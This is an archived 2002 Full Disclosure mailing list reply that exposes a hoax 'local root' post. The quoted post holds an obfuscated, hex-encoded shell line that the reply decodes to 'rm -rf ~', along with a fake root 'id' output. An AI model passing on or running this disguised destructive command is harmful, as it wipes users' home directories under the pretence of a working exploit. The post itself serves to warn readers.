Full Disclosure mailing list archives

ATTENTION Local Root ATTENTION

From: draht () suse de (Roman Drahtmueller)
Date: Sun, 15 Sep 2002 16:25:31 +0200 (MEST)


bash# ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo -e 
"\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
server error  ^


Yes.

This results in executing

rm -rf ~

$ id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)


Vendors are already informed.


Yes yes...


Greets: Captain Crunch, Peter Pan, Charly Root


Regards
--
DrDre security research group



Always good for a Sunday afternoon entertainment,
Roman.
-- 
 -                                                                      -
| Roman Drahtmüller      <draht () suse de> // "You don't need eyes to see, |
  SuSE Linux AG - Security       Phone: //             you need vision!"
| Nürnberg, Germany     +49-911-740530 //           Maxi Jazz, Faithless |
 -                                                                      -

Current thread:

ATTENTION Local Root ATTENTION drdre () hush com (Sep 15)
- ATTENTION Local Root ATTENTION Roman Drahtmueller (Sep 15)